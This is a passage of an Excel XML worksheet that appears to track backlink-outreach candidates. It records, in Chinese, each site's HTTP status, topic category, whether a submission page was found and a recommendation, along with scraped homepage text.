        <x:v>这是候选，不代表一定能获得 backlink。 | 请求: https://sonningcommonprimary.co.uk</x:v>
      </x:c>
    </x:row>
    <x:row r="195">
      <x:c r="A195" s="18" t="str">
        <x:v>194</x:v>
      </x:c>
      <x:c r="B195" s="19" t="str">
        <x:v>solarlivingsavvy.com</x:v>
      </x:c>
      <x:c r="C195" s="19" t="str">
        <x:v>https://solarlivingsavvy.com</x:v>
      </x:c>
      <x:c r="D195" s="20" t="str">
        <x:v>1</x:v>
      </x:c>
      <x:c r="E195" s="20" t="str">
        <x:v>0</x:v>
      </x:c>
      <x:c r="F195" s="20" t="str">
        <x:v>200</x:v>
      </x:c>
      <x:c r="G195" s="19" t="str">
        <x:v>可访问</x:v>
      </x:c>
      <x:c r="H195" s="19" t="str">
        <x:v>https://solarlivingsavvy.com/</x:v>
      </x:c>
      <x:c r="I195" s="19" t="str">
        <x:v>Solar Living Savvy - Solar Living Savvy</x:v>
      </x:c>
      <x:c r="J195" s="19" t="str">
        <x:v>亲子/资源站</x:v>
      </x:c>
      <x:c r="K195" s="19" t="str">
        <x:v>中</x:v>
      </x:c>
      <x:c r="L195" s="19" t="str">
        <x:v>未发现公开投稿入口</x:v>
      </x:c>
      <x:c r="M195" s="19" t="str">
        <x:v>https://solarlivingsavvy.com/</x:v>
      </x:c>
      <x:c r="N195" s="19" t="str">
        <x:v>需人工核验</x:v>
      </x:c>
      <x:c r="O195" s="19" t="str">
        <x:v>低</x:v>
      </x:c>
      <x:c r="P195" s="21" t="str">
        <x:v>主题可能相关，但首页未确认公开投稿入口；需要人工打开联系页和站内搜索。</x:v>
      </x:c>
      <x:c r="Q195" s="21" t="str">
        <x:v>Solar Guides Local Solar DIY Project Solar Living Savvy - Solar Living Savvy Skip to content Menu Menu Solar Guide Solar Lifestyle Local Solar DIY Projects 5 Tips On How to Become a Solar Panel Installer Home solar is a fast-growing industry and offers some promising career opportunities. By 2023 just over 4 million American homes had installed solar panels but this figure is expected to… Solar Guides 5 Tips On How to Become a Solar Panel Installer 6 Steps To Clean Your Solar Panels How Much Energy Do Solar Panels Produce? 5 Different Types of Batteries for Solar Lights: Pros &amp; Cons Solar Panel Diagrams – How Does Solar Power Work? An Honest Review of the Advanced Elements Solar Shower Bags Local Solar Solar Panel in San Antoni</x:v>
      </x:c>
      <x:c r="R195" s="19" t="str">
        <x:v>首页访问+规则初筛</x:v>
      </x:c>
      <x:c r="S195" s="22" t="n">
        <x:v>46267.18271381944</x:v>
      </x:c>
      <x:c r="T195" s="21" t="str">
        <x:v>这是候选，不代表一定能获得 backlink。 | 请求: https://solarlivingsavvy.com</x:v>
      </x:c>
    </x:row>
    <x:row r="196">
      <x:c r="A196" s="18" t="str">
        <x:v>195</x:v>
      </x:c>
      <x:c r="B196" s="19" t="str">
        <x:v>getblogo.com</x:v>
      </x:c>
      <x:c r="C196" s="19" t="str">
        <x:v>https://getblogo.com</x:v>
      </x:c>
      <x:c r="D196" s="20" t="str">
        <x:v>1</x:v>
      </x:c>
      <x:c r="E196" s="20" t="str">
        <x:v>0</x:v>
      </x:c>
      <x:c r="F196" s="20" t="str">
        <x:v>200</x:v>
      </x:c>
      <x:c r="G196" s="19" t="str">
        <x:v>可访问</x:v>
      </x:c>
      <x:c r="H196" s="19" t="str">
        <x:v>https://getblogo.com/</x:v>
      </x:c>
      <x:c r="I196" s="19" t="str">
        <x:v>Get Blogo - Web Magazine -</x:v>
      </x:c>
      <x:c r="J196" s="19" t="str">
        <x:v>教育/教师站</x:v>
      </x:c>
      <x:c r="K196" s="19" t="str">
        <x:v>中</x:v>
      </x:c>
      <x:c r="L196" s="19" t="str">
        <x:v>未发现公开投稿入口</x:v>
      </x:c>
      <x:c r="M196" s="19" t="str">
        <x:v>https://getblogo.com/</x:v>
      </x:c>
      <x:c r="N196" s="19" t="str">
        <x:v>需人工核验</x:v>
      </x:c>
      <x:c r="O196" s="19" t="str">
        <x:v>低</x:v>
      </x:c>
      <x:c r="P196" s="21" t="str">
        <x:v>主题可能相关，但首页未确认公开投稿入口；需要人工打开联系页和站内搜索。</x:v>
      </x:c>
      <x:c r="Q196" s="21" t="str">
        <x:v>Get Blogo - Web Magazine - No Result View All Result Home Business Marketing Finance Home and Garden Education and Career Fashion and Beauty Health Tech Home Business Marketing Finance Home and Garden Education and Career Fashion and Beauty Health Tech No Result View All Result No Result View All Result Business Is HomeAssure Administration Legitimate? BBB Rating, Accreditation, and Common Complaints Explained by Miles Austine August 24, 2026 Finance SHR Miner has launched a free cloud mining service for holders of BTC, XRP, and ETH, offering daily earnings of $10,700 or more August 11, 2026 Business How Southeast Data Centers Maintain ISO-14644 Cleanroom Standards June 24, 2026 Business How</x:v>
      </x:c>
      <x:c r="R196" s="19" t="str">
        <x:v>首页访问+规则初筛</x:v>
      </x:c>
      <x:c r="S196" s="22" t="n">
        <x:v>46267.18271381944</x:v>
      </x:c>
      <x:c r="T196" s="21" t="str">
        <x:v>这是候选，不代表一定能获得 backlink。 | 请求: https://getblogo.com</x:v>
      </x:c>
    </x:row>
    <x:row r="197">
      <x:c r="A197" s="18" t="str">
        <x:v>196</x:v>
      </x:c>
      <x:c r="B197" s="19" t="str">
        <x:v>dyslexia-testing.co.uk</x:v>
      </x:c>
      <x:c r="C197" s="19" t="str">
        <x:v>https://dyslexia-testing.co.uk</x:v>
      </x:c>
      <x:c r="D197" s="20" t="str">
        <x:v>1</x:v>
      </x:c>
      <x:c r="E197" s="20" t="str">
        <x:v>0</x:v>
      </x:c>
      <x:c r="F197" s="20" t="str">
        <x:v>200</x:v>
      </x:c>
      <x:c r="G197" s="19" t="str">
        <x:v>可访问</x:v>
      </x:c>
      <x:c r="H197" s="19" t="str">
        <x:v>https://dyslexia-testing.co.uk/</x:v>
      </x:c>
      <x:c r="I197" s="19" t="str">
        <x:v>Holly Swinton | Dyslexia Assessment Across England, inc. Midlands, Oxfordshire, Warwickshire</x:v>
      </x:c>
      <x:c r="J197" s="19" t="str">
        <x:v>非目标主题/普通站点</x:v>
      </x:c>
      <x:c r="K197" s="19" t="str">
        <x:v>低</x:v>
      </x:c>
      <x:c r="L197" s="19" t="str">
        <x:v>未发现</x:v>
      </x:c>
      <x:c r="M197" s="19" t="str">
        <x:v>https://dyslexia-testing.co.uk/</x:v>
      </x:c>
      <x:c r="N197" s="19" t="str">
        <x:v>不建议</x:v>
      </x:c>
      <x:c r="O197" s="19" t="str">
        <x:v>低</x:v>
      </x:c>
      <x:c r="P197" s="21" t="str">
        <x:v>首页主题与科学教育单位换算关联弱，且未发现明确的公开投稿或资源提交入口。</x:v>
      </x:c>
      <x:c r="Q197" s="21" t="str">
        <x:v>Holly Swinton is a Specialist Dyslexia Assessor, providing dyslexia assessment, testing and diagnosis across Oxfordshire, Warwickshire, West Midlands, Somerset, Gloucestershire, Wiltshire and beyond. Holly Swinton | Dyslexia Assessment Across England, inc. Midlands, Oxfordshire, Warwickshire Skip to content SALE: 10% off (limited time) About Services Locations Costs Testimonials Dyslexia, Explained Contact SALE: 10% off Dyslexia Assessment with a Difference Holly Swinton is a Specialist Dyslexia Assessor , with over ten years’ experience providing dyslexia assessment, testing and diagnosis across Oxfordshire , Warwickshire , West Midlands , Somerset, Gloucestershire, Wiltshire and beyond. What makes Holly different “I cannot recommend Holly highly enough. She is one of the most knowledgeable and compassionate people I have ever met.” Katharine G SALE: 10% off For a limited time only: get</x:v>
      </x:c>
      <x:c r="R197" s="19" t="str">
        <x:v>首页访问+规则初筛</x:v>
      </x:c>
      <x:c r="S197" s="22" t="n">
        <x:v>46267.18271381944</x:v>
      </x:c>
      <x:c r="T197" s="21" t="str">
        <x:v>如有特殊合作关系，再单独人工复核。 | 请求: https://dyslexia-testing.co.uk</x:v>
      </x:c>
    </x:row>
    <x:row r="198">
      <x:c r="A198" s="18" t="str">
        <x:v>197</x:v>
      </x:c>
      <x:c r="B198" s="19" t="str">
        <x:v>livinglifeandlearning.com</x:v>
      </x:c>
      <x:c r="C198" s="19" t="str">
        <x:v>https://livinglifeandlearning.com</x:v>
      </x:c>
      <x:c r="D198" s="20" t="str">
        <x:v>1</x:v>
      </x:c>
      <x:c r="E198" s="20" t="str">
        <x:v>4</x:v>
      </x:c>
      <x:c r="F198" s="20" t="str">
        <x:v>200</x:v>
      </x:c>
      <x:c r="G198" s="19" t="str">
        <x:v>可访问</x:v>
      </x:c>
      <x:c r="H198" s="19" t="str">
        <x:v>https://www.livinglifeandlearning.com/</x:v>
      </x:c>
      <x:c r="I198" s="19" t="str">
        <x:v>Living Life and Learning: Fun Science Activities for Kids</x:v>
      </x:c>
      <x:c r="J198" s="19" t="str">
        <x:v>教育/教师站</x:v>
      </x:c>
      <x:c r="K198" s="19" t="str">
        <x:v>中</x:v>
      </x:c>
      <x:c r="L198" s="19" t="str">
        <x:v>首页发现提交相关词</x:v>
      </x:c>
      <x:c r="M198" s="19" t="str">
        <x:v>https://www.livinglifeandlearning.com/</x:v>
      </x:c>
      <x:c r="N198" s="19" t="str">
        <x:v>需人工核验</x:v>
      </x:c>
      <x:c r="O198" s="19" t="str">
        <x:v>中</x:v>
      </x:c>
      <x:c r="P198" s="21" t="str">
        <x:v>首页出现提交、资源、合作或投稿相关信号，但尚未深查具体规则。</x:v>
      </x:c>
      <x:c r="Q198" s="21" t="str">
        <x:v>Hands-on science activities for kids from preschool to kindergarten and elementary age students to help make teaching science easier for homeschoolers and teachers. Living Life and Learning: Fun Science Activities for Kids Skip to content Start Here Science Biology for Kids Chemistry for Kids Earth Science for Kids STEM Activities Homeschool Visual Learners Do you have a Visual Spatial Learner? Homeschool Planning New to Homeschooling? Homeschool 101 Homeschool Schedules Homeschool Curriculum Book Lists Field Trips Resources By Season Summer Activities Fall Activities Thanksgiving Activities Winter Activities Christmas Activities Easter Activities Spring Activities By Grade Toddler Activities Preschool Activities Kindergarten Activities Elementary Activities Middle School Activities Shop Book Teaching Science Doesn’t Have to be Hard See all the latest f</x:v>
      </x:c>
      <x:c r="R198" s="19" t="str">
        <x:v>首页访问+规则初筛</x:v>
      </x:c>
      <x:c r="S198" s="22" t="n">
        <x:v>46267.18271381944</x:v>
      </x:c>
      <x:c r="T198" s="21" t="str">
        <x:v>这是候选，不代表一定能获得 backlink。 | 请求: https://livinglifeandlearning.com</x:v>
      </x:c>
    </x:row>
    <x:row r="199">
      <x:c r="A199" s="18" t="str">
        <x:v>198</x:v>
      </x:c>
      <x:c r="B199" s="19" t="str">
        <x:v>webflow.io</x:v>
      </x:c>
      <x:c r="C199" s="19" t="str">
        <x:v>https://webflow.io</x:v>
      </x:c>
      <x:c r="D199" s="20" t="str">
        <x:v>1</x:v>
      </x:c>
      <x:c r="E199" s="20" t="str">
        <x:v>0</x:v>
      </x:c>
      <x:c r="F199" s="20" t="str">
        <x:v>200</x:v>
      </x:c>
      <x:c r="G199" s="19" t="str">
        <x:v>可访问</x:v>
      </x:c>
      <x:c r="H199" s="19" t="str">
        <x:v>https://webflow.com/</x:v>
      </x:c>
      <x:c r="I199" s="19" t="str">
        <x:v>Webflow: The agentic web platform for modern businesses</x:v>
      </x:c>
      <x:c r="J199" s="19" t="str">
        <x:v>亲子/资源站</x:v>
      </x:c>
      <x:c r="K199" s="19" t="str">
        <x:v>中</x:v>
      </x:c>
      <x:c r="L199" s="19" t="str">
        <x:v>首页发现提交相关词</x:v>
      </x:c>
      <x:c r="M199" s="19" t="str">
        <x:v>https://webflow.com/</x:v>
      </x:c>
      <x:c r="N199" s="19" t="str">
        <x:v>需人工核验</x:v>
      </x:c>
      <x:c r="O199" s="19" t="str">
        <x:v>中</x:v>
      </x:c>
      <x:c r="P199" s="21" t="str">
        <x:v>首页出现提交、资源、合作或投稿相关信号，但尚未深查具体规则。</x:v>
      </x:c>
      <x:c r="Q199" s="21" t="str">
        <x:v>Design, build, optimize, and rank in AI search — all in Webflow. Enterprise-grade security, CMS, hosting, and AEO built in. Trusted by over 300k teams. Webflow: The agentic web platform for modern businesses Seth Meyers will be at Webflow Conf '26. Read the announcement → Skip to Main Content Platform → Platform ← Back Build Design Edit content Interactions Collaboration Page building Manage CMS Hosting Localize Security Shared Libraries Optimize Analyze Optimize SEO AEO new Extend Apps Figma to Webflow Webflow Cloud DevLink MCP new Platform Overview Explore the power of the Webflow platform Learn more about Platform Webflow AI Elevate web experiences with the power of AI Learn more about Ai I'm a Marketer Marketer Designer Developer Agency Appearance Light mode Dark mode Auto (OS) Solutions → Solutions ← Back Marketing Brand Performance Di</x:v>
      </x:c>
      <x:c r="R199" s="19" t="str">
        <x:v>首页访问+规则初筛</x:v>
      </x:c>
      <x:c r="S199" s="22" t="n">
        <x:v>46267.18271381944</x:v>
      </x:c>
      <x:c r="T199" s="21" t="str">
        <x:v>这是候选，不代表一定能获得 backlink。 | 请求: https://webflow.io</x:v>
      </x:c>
    </x:row>
    <x:row r="200">
      <x:c r="A200" s="18" t="str">
        <x:v>199</x:v>
      </x:c>
      <x:c r="B200" s="19" t="str">
        <x:v>thrivecart.com</x:v>
      </x:c>
      <x:c r="C200" s="19" t="str">
        <x:v>https://thrivecart.com</x:v>
      </x:c>
      <x:c r="D200" s="20" t="str">
        <x:v>1</x:v>
      </x:c>
      <x:c r="E200" s="20" t="str">
        <x:v>0</x:v>
      </x:c>
      <x:c r="F200" s="20" t="str">
        <x:v>200</x:v>
      </x:c>
      <x:c r="G200" s="19" t="str">
        <x:v>可访问</x:v>
      </x:c>
      <x:c r="H200" s="19" t="str">
        <x:v>https://thrivecart.com/</x:v>
      </x:c>
      <x:c r="I200" s="19" t="str">
        <x:v>The Creator Stack for Coursemakers &amp; Communities | ThriveCart</x:v>
      </x:c>
      <x:c r="J200" s="19" t="str">
        <x:v>亲子/资源站</x:v>
      </x:c>
      <x:c r="K200" s="19" t="str">
        <x:v>中</x:v>
      </x:c>
      <x:c r="L200" s="19" t="str">
        <x:v>首页发现提交相关词</x:v>
      </x:c>
      <x:c r="M200" s="19" t="str">
        <x:v>https://thrivecart.com/</x:v>
      </x:c>
      <x:c r="N200" s="19" t="str">
        <x:v>需人工核验</x:v>
      </x:c>
      <x:c r="O200" s="19" t="str">
        <x:v>中</x:v>
      </x:c>
      <x:c r="P200" s="21" t="str">
        <x:v>首页出现提交、资源、合作或投稿相关信号，但尚未深查具体规则。</x:v>
      </x:c>
      <x:c r="Q200" s="21" t="str">
        <x:v>Sell digital products, courses, communities and subscriptions with high-converting checkouts, funnels, and 1,000+ automations. 30-day free trial. The Creator Stack for Coursemakers &amp; Communities | ThriveCart Creator Commerce Live 🎉 - Sept, 17th, 2026, 10am-4pm ET - Free Join Us Creator Commerce Live 🎉 - Sept, 17th, 2026, 10am-4pm ET - Free Join Us Features Academy Pricing Industries Resources Get Started Free Login The Creator Stack used by 75,000+ solopreneurs, coursemakers, and community builders Sell digital &amp; physical products, courses, communities, memberships, and subscriptions with high-converting checkouts, powerful funnels, and thousands of automations. Start Your 30-Day Free Trial Trustpilot 4.6 / 5 G2 4.6 / 5 Product Hunt 5 / 5 Capterra 4.7 / 5 Embedded courses &amp; social learning High-converting checkout &amp; funnels Branded </x:v>
      </x:c>
      <x:c r="R200" s="19" t="str">
        <x:v>首页访问+规则初筛</x:v>
      </x:c>
      <x:c r="S200" s="22" t="n">
        <x:v>46267.18271381944</x:v>
      </x:c>
      <x:c r="T200" s="21" t="str">
        <x:v>这是候选，不代表一定能获得 backlink。 | 请求: https://thrivecart.com</x:v>
      </x:c>
    </x:row>
    <x:row r="201">
      <x:c r="A201" s="18" t="str">
        <x:v>200</x:v>
      </x:c>
      <x:c r="B201" s="19" t="str">
        <x:v>thecanadianhomeschooler.com</x:v>
      </x:c>
      <x:c r="C201" s="19" t="str">
        <x:v>https://thecanadianhomeschooler.com</x:v>
      </x:c>
      <x:c r="D201" s="20" t="str">
        <x:v>1</x:v>
      </x:c>
      <x:c r="E201" s="20" t="str">
        <x:v>0</x:v>
      </x:c>
      <x:c r="F201" s="20" t="str">
        <x:v>200</x:v>
      </x:c>
      <x:c r="G201" s="19" t="str">
        <x:v>可访问</x:v>
      </x:c>
      <x:c r="H201" s="19" t="str">
        <x:v>https://thecanadianhomeschooler.com/</x:v>
      </x:c>
      <x:c r="I201" s="19" t="str">
        <x:v>The Canadian Homeschooler: Homeschooling Resources for Families</x:v>
      </x:c>
      <x:c r="J201" s="19" t="str">
        <x:v>Homeschool 资源站</x:v>
      </x:c>
      <x:c r="K201" s="19" t="str">
        <x:v>高</x:v>
      </x:c>
      <x:c r="L201" s="19" t="str">
        <x:v>明确拒绝 guest/paid link</x:v>
      </x:c>
      <x:c r="M201" s="19" t="str">
        <x:v>https://thecanadianhomeschooler.com/about/</x:v>
      </x:c>
      <x:c r="N201" s="19" t="str">
        <x:v>不建议</x:v>
      </x:c>
      <x:c r="O201" s="19" t="str">
        <x:v>低</x:v>
      </x:c>
      <x:c r="P201" s="21" t="str">
        <x:v>当前页面明确不接受 guest posts 和 paid link placements；仅可能考虑付费合作。</x:v>
      </x:c>
      <x:c r="Q201" s="21" t="str">
        <x:v>The Canadian Homeschooler helps connect Canadian homeschooling families and provides them with engaging homeschool resources to help them on their learning journey. The Canadian Homeschooler: Homeschooling Resources for Families Skip to content Main Menu HOME ABOUT BOOK PLANNER RESOURCE SHOP LEARNING CENTRE CONFERENCE CHAT WITH ME PODCAST YOU'VE DECIDED TO HOMESCHOOL. NOW WHAT? Visit the Getting Started page to learn what’s next. Discover practical steps, helpful tools, and encouragement for the journey ahead. BEGIN YOUR HOMESCHOOL JOURNEY Menu HOMESCHOOL BASICS CURRICULUM &amp; RESOURCES HOMESCHOOL LIFE HOMESCHOOL CHALLENGES HIGH SCHOOL &amp; BEYOND PRESCHOOL PARENTAL SUPPORT Get Canadian homeschooling support delivered to your inbox! Grab this issue of The Canadian Homeschooler Compass Digital Magazine - packed with practical tips, featured resources, encoura</x:v>
      </x:c>
      <x:c r="R201" s="19" t="str">
        <x:v>重点站点人工核验</x:v>
      </x:c>
      <x:c r="S201" s="22" t="n">
        <x:v>46267.18271381944</x:v>
      </x:c>
      <x:c r="T201" s="21" t="str">
        <x:v>不列入免费外链批次。 | 请求: https://thecanadianhomeschooler.com</x:v>
      </x:c>
    </x:row>
    <x:row r="202">
      <x:c r="A202" s="18" t="str">
        <x:v>201</x:v>
      </x:c>
      <x:c r="B202" s="19" t="str">
        <x:v>pearltrees.com</x:v>
      </x:c>
      <x:c r="C202" s="19" t="str">
        <x:v>https://pearltrees.com</x:v>
      </x:c>
      <x:c r="D202" s="20" t="str">
        <x:v>1</x:v>
      </x:c>
      <x:c r="E202" s="20" t="str">
        <x:v>0</x:v>
      </x:c>
      <x:c r="F202" s="20" t="str">
        <x:v>200</x:v>
      </x:c>
      <x:c r="G202" s="19" t="str">
        <x:v>可访问</x:v>
      </x:c>
      <x:c r="H202" s="19" t="str">
        <x:v>https://www.pearltrees.com/</x:v>
      </x:c>
      <x:c r="I202" s="19" t="str">
        <x:v>Pearltrees</x:v>
      </x:c>
      <x:c r="J202" s="19" t="str">
        <x:v>平台/个人发布平台</x:v>
      </x:c>
      <x:c r="K202" s="19" t="str">
        <x:v>中</x:v>
      </x:c>
      <x:c r="L202" s="19" t="str">
        <x:v>平台自建内容</x:v>
      </x:c>
      <x:c r="M202" s="19" t="str">
        <x:v>https://www.pearltrees.com/</x:v>
      </x:c>
      <x:c r="N202" s="19" t="str">
        <x:v>不建议</x:v>
      </x:c>
      <x:c r="O202" s="19" t="str">
        <x:v>低</x:v>
      </x:c>
      <x:c r="P202" s="21" t="str">
        <x:v>这是内容发布或个人资料平台，不是自然获得的编辑型外链目标。</x:v>
      </x:c>
      <x:c r="Q202" s="21" t="str">
        <x:v>Pearltrees is a place to organize everything you’re interested in. It lets you organize, explore and share everything you like. Pearltrees About Pearltrees About Pearltrees AI iOS app Android app Contact Popular Privacy policy Terms of service FAQs Organize, collaborate and share everything you like Add and transform your content with Pearltrees AI Organize, customize and give meaning to your collections Collaborate, share and discover your way Create your account to organize everything! Organize everything Log in to Pearltrees label label Join Log in Via Facebook Via X Via Google Create your account label label label label label label Join Log in Pearltrees Premium Pearltrees Education Manuels Ouverts It's quick and it's free Lost your password? lostPassword label username: label bio: label realname: label email: la</x:v>
      </x:c>
      <x:c r="R202" s="19" t="str">
        <x:v>首页访问+规则初筛</x:v>
      </x:c>
      <x:c r="S202" s="22" t="n">
        <x:v>46267.18271381944</x:v>
      </x:c>
      <x:c r="T202" s="21" t="str">
        <x:v>不能把平台自身的用户页面当成高质量目录外链。 | 请求: https://pearltrees.com</x:v>
      </x:c>
    </x:row>
    <x:row r="203">
      <x:c r="A203" s="18" t="str">
        <x:v>202</x:v>
      </x:c>
      <x:c r="B203" s="19" t="str">
        <x:v>660amtheanswer.com</x:v>
      </x:c>
      <x:c r="C203" s="19" t="str">
        <x:v>https://660amtheanswer.com</x:v>
      </x:c>
      <x:c r="D203" s="20" t="str">
        <x:v>1</x:v>
      </x:c>
      <x:c r="E203" s="20" t="str">
        <x:v>0</x:v>
      </x:c>
      <x:c r="F203" s="20" t="str">
        <x:v>403</x:v>
      </x:c>
      <x:c r="G203" s="19" t="str">
        <x:v>HTTP错误</x:v>
      </x:c>
      <x:c r="H203" s="19" t="str">
        <x:v>https://660amtheanswer.com/</x:v>
      </x:c>
      <x:c r="I203" s="19" t="str">
        <x:v>Attention Required! | Cloudflare</x:v>
      </x:c>
      <x:c r="J203" s="19" t="str">
        <x:v>非目标主题/普通站点</x:v>
      </x:c>
      <x:c r="K203" s="19" t="str">
        <x:v>低</x:v>
      </x:c>
      <x:c r="L203" s="19" t="str">
        <x:v>未发现</x:v>
      </x:c>
      <x:c r="M203" s="19" t="str">
        <x:v>https://660amtheanswer.com/</x:v>
      </x:c>
      <x:c r="N203" s="19" t="str">
        <x:v>不建议</x:v>
      </x:c>
      <x:c r="O203" s="19" t="str">
        <x:v>低</x:v>
      </x:c>
      <x:c r="P203" s="21" t="str">
        <x:v>首页主题与科学教育单位换算关联弱，且未发现明确的公开投稿或资源提交入口。</x:v>
      </x:c>
      <x:c r="Q203" s="21" t="str">
        <x:v>Attention Required! | Cloudflare Please enable cookies. Sorry, you have been blocked You are unable to access 660amtheanswer.com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a349b96c18fd49f9 &amp;bull; Your IP: Cl</x:v>
      </x:c>
      <x:c r="R203" s="19" t="str">
        <x:v>首页访问+规则初筛</x:v>
      </x:c>
      <x:c r="S203" s="22" t="n">
        <x:v>46267.18271381944</x:v>
      </x:c>
      <x:c r="T203" s="21" t="str">
        <x:v>如有特殊合作关系，再单独人工复核。 | 请求: https://660amtheanswer.com</x:v>
      </x:c>
    </x:row>
    <x:row r="204">
      <x:c r="A204" s="18" t="str">
        <x:v>203</x:v>
      </x:c>
      <x:c r="B204" s="19" t="str">
        <x:v>thelotteryhub.com</x:v>
      </x:c>
      <x:c r="C204" s="19" t="str">
        <x:v>https://thelotteryhub.com</x:v>
      </x:c>
      <x:c r="D204" s="20" t="str">
        <x:v>1</x:v>
      </x:c>
      <x:c r="E204" s="20" t="str">
        <x:v>0</x:v>
      </x:c>
      <x:c r="F204" s="20" t="str">
        <x:v>200</x:v>
      </x:c>
      <x:c r="G204" s="19" t="str">
        <x:v>可访问</x:v>
      </x:c>
      <x:c r="H204" s="19" t="str">
        <x:v>https://www.thelotteryhub.com/</x:v>
      </x:c>
      <x:c r="I204" s="19" t="str">
        <x:v>Home - The Lottery Hub</x:v>
      </x:c>
      <x:c r="J204" s="19" t="str">
        <x:v>非目标主题/普通站点</x:v>
      </x:c>
      <x:c r="K204" s="19" t="str">
        <x:v>低</x:v>
      </x:c>
      <x:c r="L204" s="19" t="str">
        <x:v>未发现</x:v>
      </x:c>
      <x:c r="M204" s="19" t="str">
        <x:v>https://www.thelotteryhub.com/</x:v>
      </x:c>
      <x:c r="N204" s="19" t="str">
        <x:v>不建议</x:v>
      </x:c>
      <x:c r="O204" s="19" t="str">
        <x:v>低</x:v>
      </x:c>
      <x:c r="P204" s="21" t="str">
        <x:v>首页主题与科学教育单位换算关联弱，且未发现明确的公开投稿或资源提交入口。</x:v>
      </x:c>
      <x:c r="Q204" s="21" t="str">
        <x:v>By Lily ParsonsJuly 7, 2024 Home - The Lottery Hub Home Just in Shop IKEA Home &amp; Kitchen Home Just in Shop IKEA Home &amp; Kitchen meals 11 Delicious Easy Crispy Baked Chicken Recipes By Lily Parsons July 18, 2025 Dinner just got a whole lot tastier with our roundup of 11 Delicious Easy Crispy… meals 11 Delicious Raspberry White Chocolate Mousse Recipes By Lily Parsons July 18, 2025 meals 11 Delicious Simple Salad With Halloumi Recipes By Lily Parsons July 18, 2025 Our Picks 11 Delicious Shredded Apple Carrot Salad Recipes By Lily Parsons July 18, 2025 11 Delicious Authentic Horchata Refreshing Recipes By Lily Parsons July 18, 2025 11 Delicious Pocket Bread Recipes You Must Try By Lily Parsons July 18, 2025 11 Delicious Or</x:v>
      </x:c>
      <x:c r="R204" s="19" t="str">
        <x:v>首页访问+规则初筛</x:v>
      </x:c>
      <x:c r="S204" s="22" t="n">
        <x:v>46267.18271381944</x:v>
      </x:c>
      <x:c r="T204" s="21" t="str">
        <x:v>如有特殊合作关系，再单独人工复核。 | 请求: https://thelotteryhub.com</x:v>
      </x:c>
    </x:row>
    <x:row r="205">
      <x:c r="A205" s="18" t="str">
        <x:v>204</x:v>
      </x:c>
      <x:c r="B205" s="19" t="str">
        <x:v>twinkl.co.cr</x:v>
      </x:c>
      <x:c r="C205" s="19" t="str">
        <x:v>https://twinkl.co.cr</x:v>
      </x:c>
      <x:c r="D205" s="20" t="str">
        <x:v>1</x:v>
      </x:c>
      <x:c r="E205" s="20" t="str">
        <x:v>0</x:v>
      </x:c>
      <x:c r="F205" s="20" t="str">
        <x:v>200</x:v>
      </x:c>
      <x:c r="G205" s="19" t="str">
        <x:v>可访问</x:v>
      </x:c>
      <x:c r="H205" s="19" t="str">
        <x:v>https://www.twinkl.co.cr/</x:v>
      </x:c>
      <x:c r="I205" s="19" t="str"/>
      <x:c r="J205" s="19" t="str">
        <x:v>非目标主题/普通站点</x:v>
      </x:c>
      <x:c r="K205" s="19" t="str">
        <x:v>低</x:v>
      </x:c>
      <x:c r="L205" s="19" t="str">
        <x:v>未发现</x:v>
      </x:c>
      <x:c r="M205" s="19" t="str">
        <x:v>https://www.twinkl.co.cr/</x:v>
      </x:c>
      <x:c r="N205" s="19" t="str">
        <x:v>不建议</x:v>
      </x:c>
      <x:c r="O205" s="19" t="str">
        <x:v>低</x:v>
      </x:c>
      <x:c r="P205" s="21" t="str">
        <x:v>首页主题与科学教育单位换算关联弱，且未发现明确的公开投稿或资源提交入口。</x:v>
      </x:c>
      <x:c r="Q205" s="21" t="str"/>
      <x:c r="R205" s="19" t="str">
        <x:v>首页访问+规则初筛</x:v>
      </x:c>
      <x:c r="S205" s="22" t="n">
        <x:v>46267.18271381944</x:v>
      </x:c>
      <x:c r="T205" s="21" t="str">
        <x:v>如有特殊合作关系，再单独人工复核。 | 请求: https://twinkl.co.cr</x:v>
      </x:c>
    </x:row>
    <x:row r="206">
      <x:c r="A206" s="18" t="str">
        <x:v>205</x:v>
      </x:c>
      <x:c r="B206" s="19" t="str">
        <x:v>twinkl.com.sg</x:v>
      </x:c>
      <x:c r="C206" s="19" t="str">
        <x:v>https://twinkl.com.sg</x:v>
      </x:c>
      <x:c r="D206" s="20" t="str">
        <x:v>1</x:v>
      </x:c>
      <x:c r="E206" s="20" t="str">
        <x:v>0</x:v>
      </x:c>
      <x:c r="F206" s="20" t="str">
        <x:v>200</x:v>
      </x:c>
      <x:c r="G206" s="19" t="str">
        <x:v>可访问</x:v>
      </x:c>
      <x:c r="H206" s="19" t="str">
        <x:v>https://www.twinkl.com.sg/</x:v>
      </x:c>
      <x:c r="I206" s="19" t="str"/>
      <x:c r="J206" s="19" t="str">
        <x:v>非目标主题/普通站点</x:v>
      </x:c>
      <x:c r="K206" s="19" t="str">
        <x:v>低</x:v>
      </x:c>
      <x:c r="L206" s="19" t="str">
        <x:v>未发现</x:v>
      </x:c>
      <x:c r="M206" s="19" t="str">
        <x:v>https://www.twinkl.com.sg/</x:v>
      </x:c>
      <x:c r="N206" s="19" t="str">
        <x:v>不建议</x:v>
      </x:c>
      <x:c r="O206" s="19" t="str">
        <x:v>低</x:v>
      </x:c>
      <x:c r="P206" s="21" t="str">
        <x:v>首页主题与科学教育单位换算关联弱，且未发现明确的公开投稿或资源提交入口。</x:v>
      </x:c>
      <x:c r="Q206" s="21" t="str"/>
      <x:c r="R206" s="19" t="str">
        <x:v>首页访问+规则初筛</x:v>
      </x:c>
      <x:c r="S206" s="22" t="n">
        <x:v>46267.18271381944</x:v>
      </x:c>
      <x:c r="T206" s="21" t="str">
        <x:v>如有特殊合作关系，再单独人工复核。 | 请求: https://twinkl.com.sg</x:v>
      </x:c>
    </x:row>
    <x:row r="207">
      <x:c r="A207" s="18" t="str">
        <x:v>206</x:v>
      </x:c>
      <x:c r="B207" s="19" t="str">
        <x:v>papelariajardimbotanico.com.br</x:v>
      </x:c>
      <x:c r="C207" s="19" t="str">
        <x:v>https://papelariajardimbotanico.com.br</x:v>
      </x:c>
      <x:c r="D207" s="20" t="str">
        <x:v>1</x:v>
      </x:c>
      <x:c r="E207" s="20" t="str">
        <x:v>0</x:v>
      </x:c>
      <x:c r="F207" s="20"/>
      <x:c r="G207" s="19" t="str">
        <x:v>无法连接</x:v>
      </x:c>
      <x:c r="H207" s="19" t="str"/>
      <x:c r="I207" s="19" t="str"/>
      <x:c r="J207" s="19" t="str">
        <x:v>未知</x:v>
      </x:c>
      <x:c r="K207" s="19" t="str">
        <x:v>未知</x:v>
      </x:c>
      <x:c r="L207" s="19" t="str">
        <x:v>未取得页面</x:v>
